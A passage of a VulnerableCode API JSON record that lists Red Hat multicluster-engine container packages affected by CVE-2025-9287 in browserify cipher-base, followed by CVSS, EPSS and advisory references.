"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-api-provider-kubevirt@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89304?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-clusterclaims-controller@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-clusterclaims-controller@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89298?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-cluster-curator-controller@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-curator-controller@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89274?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-cluster-image-set-controller@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-image-set-controller@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89282?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-clusterlifecycle-state-metrics@container-v2.7?arch=6-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-clusterlifecycle-state-metrics@container-v2.7%3Farch=6-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89283?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-cluster-proxy@container-v2.7?arch=6-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-proxy@container-v2.7%3Farch=6-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89311?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-cluster-proxy-addon@container-v2.7?arch=6-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-proxy-addon@container-v2.7%3Farch=6-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89341?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-console-mce@container-v2.7?arch=6-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-console-mce@container-v2.7%3Farch=6-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89349?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-discovery-operator@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-discovery-operator@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89286?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-hive@container-v2.7?arch=6-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-hive@container-v2.7%3Farch=6-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89322?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-hypershift-addon-operator@container-v2.7?arch=6-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-hypershift-addon-operator@container-v2.7%3Farch=6-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89318?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-hypershift-cli@container-v2.7?arch=6-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-hypershift-cli@container-v2.7%3Farch=6-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89315?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-hypershift-operator@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-hypershift-operator@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89293?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-image-based-install@container-v2.7?arch=6-11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-image-based-install@container-v2.7%3Farch=6-11" }, { "url": "http://public2.vulnerablecode.io/api/packages/89321?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-kube-rbac-proxy-mce@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-kube-rbac-proxy-mce@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89309?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-managedcluster-import-controller@container-v2.7?arch=6-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-managedcluster-import-controller@container-v2.7%3Farch=6-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89299?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-managed-serviceaccount@container-v2.7?arch=6-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-managed-serviceaccount@container-v2.7%3Farch=6-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89332?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-multicloud-manager@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-multicloud-manager@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89319?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-must-gather@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-must-gather@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89312?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-operator@container-v2.7?arch=6-5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-operator@container-v2.7%3Farch=6-5" }, { "url": "http://public2.vulnerablecode.io/api/packages/89328?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-operator-bundle@container-v2.7?arch=6-9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-operator-bundle@container-v2.7%3Farch=6-9" }, { "url": "http://public2.vulnerablecode.io/api/packages/89280?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-placement@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-placement@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89336?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-provider-credential-controller@container-v2.7?arch=6-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-provider-credential-controller@container-v2.7%3Farch=6-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89323?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-registration@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-registration@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89288?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-registration-operator@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-registration-operator@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89276?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-work@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-work@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89313?format=api", "purl": "pkg:rpm/redhat/multiclusterhub-operator@container-v2.12?arch=5-5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multiclusterhub-operator@container-v2.12%3Farch=5-5" }, { "url": "http://public2.vulnerablecode.io/api/packages/89292?format=api", "purl": "pkg:rpm/redhat/multicluster-observability-operator@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-observability-operator@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89346?format=api", "purl": "pkg:rpm/redhat/multicluster-operators-application@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-operators-application@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89301?format=api", "purl": "pkg:rpm/redhat/multicluster-operators-channel@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-operators-channel@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89295?format=api", "purl": "pkg:rpm/redhat/multicluster-operators-subscription-operator@container-v2.12?arch=5-5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-operators-subscription-operator@container-v2.12%3Farch=5-5" }, { "url": "http://public2.vulnerablecode.io/api/packages/89335?format=api", "purl": "pkg:rpm/redhat/node-exporter@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/node-exporter@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89348?format=api", "purl": "pkg:rpm/redhat/observatorium@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/observatorium@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89285?format=api", "purl": "pkg:rpm/redhat/observatorium-operator@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/observatorium-operator@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89287?format=api", "purl": "pkg:rpm/redhat/prometheus@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/prometheus@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89279?format=api", "purl": "pkg:rpm/redhat/prometheus-alertmanager@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/prometheus-alertmanager@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89331?format=api", "purl": "pkg:rpm/redhat/rbac-query-proxy@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/rbac-query-proxy@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89325?format=api", "purl": "pkg:rpm/redhat/search-collector@container-v2.12?arch=5-5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/search-collector@container-v2.12%3Farch=5-5" }, { "url": "http://public2.vulnerablecode.io/api/packages/89306?format=api", "purl": "pkg:rpm/redhat/submariner-addon@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/submariner-addon@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89327?format=api", "purl": "pkg:rpm/redhat/thanos@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/thanos@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89334?format=api", "purl": "pkg:rpm/redhat/thanos-receive-controller@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/thanos-receive-controller@container-v2.12%3Farch=5-3" } ], "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9287.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9287.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-9287", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.2864", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.2875", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.28449", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.28565", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.28798", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.28615", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.28605", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.2867", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.28711", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.28713", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.28668", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00106", "scoring_system": "epss", "scoring_elements": "0.2862", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00116", "scoring_system": "epss", "scoring_elements": "0.29928", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00116", "scoring_system": "epss", "scoring_elements": "0.30006", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00116", "scoring_system": "epss", "scoring_elements": "0.29793", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.00136", "scoring_system": "epss", "scoring_elements": "0.3298", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.00136", "scoring_system": "epss", "scoring_elements": "0.3303", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.00136", "scoring_system": "epss", "scoring_elements": "0.33085", "published_at": "2026-05-14T12:55:00Z" }, { "value": "0.00136", "scoring_system": "epss", "scoring_elements": "0.33005", "published_at": "2026-05-12T12:55:00Z" }, { "value": "0.00136", "scoring_system": "epss", "scoring_elements": "0.33069", "published_at": "2026-05-09T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-9287" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9287", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9287" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/browserify/cipher-base", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "9.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/browserify/cipher-base" }, { "reference_url": "https://github.com/browserify/cipher-base/commit/8fd136432ca298a664f5637629cf2b42a6c7f294", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "9.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/browserify/cipher-base/commit/8fd136432ca298a664f5637629cf2b42a6c7f294" }, { "reference_url": "https://github.com/browserify/cipher-base/pull/23", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "9.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-21T13:25:49Z/" } ], "url": "https://github.com/browserify/cipher-base/pull/23" }, { "reference_url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-21T13:25:49Z/" } ], "url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "9.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": 